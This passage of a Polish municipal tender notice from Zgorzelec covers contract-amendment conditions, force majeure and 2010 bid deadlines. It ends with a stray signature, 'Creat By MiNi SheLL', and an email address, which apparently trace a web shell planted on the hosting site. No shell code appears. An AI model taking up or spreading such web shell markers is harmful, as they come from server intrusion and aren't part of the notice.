wykonanie robót budowlanych zgodnie z technologią  - fakt ten musi mieć 
odzwierciedlenie w Dzienniku budowy i musi być potwierdzony przez Inspektora 
Nadzoru Inwestorskiego działającego z ramienia Zamawiającego, 
c) z przyczyn losowych, w przypadku wystąpienia działania siły wyższej, mającej 
bezpośredni wpływ na terminowość wykonania robót budowlanych. Pod pojęciem 
siły wyższej Zamawiający rozumieć będzie  zdarzenie zewnętrzne o charakterze: 
niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem 
umowy i którego nie można uniknąć ani któremu strony nie mogły zapobiec przy 
zachowaniu  należytej staranności.  
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności:
powódź, pożar i inne klęski żywiołowe, zamieszki, strajki (nie dotyczą 
pracowników Wykonawcy), ataki terrorystyczne, działania wojenne, nagłe przerwy 
w dostawie energii elektrycznej, promieniowanie, lub skażenia, 
d) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym 
wpływ na realizację przedmiotu zamówienia,                  
e) wstrzymania robót budowlanych  przez uprawnione organy.         
2) Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych za 
realizację umowy, o których mowa w § 11 projektu umowy.    
3) Zmiana Podwykonawcy możliwa będzie jedynie wtedy, gdy zakres realizowanych przez Podwykonawcę robót, nie ulegnie zmianie w stosunku do zakresu robót wskazanych w ofercie Wykonawcy, a które zaplanował on do realizacji przez Podwykonawcę. Zmiana taka możliwa będzie jedynie na uzasadniony  wniosek Wykonawcy, do którego winien załączyć projekt umowy z Podwykonawcą, przy czym wymagana jest w tym przypadku pisemna zgoda Zamawiającego na zawarcie przez Wykonawcę umowy z innym Podwykonawcą. 
2. W przedstawionych w punkcie 1 podpunkt 1 przypadkach wystąpienia opóźnień, 
strony ustalają nowe terminy realizacji umowy, z tym, że okres  przesunięcia 
terminu realizacji przedmiotu umowy równy będzie co najmniej okresowi przerwy lub 
postoju. 
3. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą ze stron umowy. 
4. Strona ubiegająca się o zmianę umowy w w/w przypadkach, winna zwrócić się do  
Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
zmian  w umowie aneksem, w  terminie 7 dni od daty zaistniałej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2010 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec 
ul.  Domańskiego 7
Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com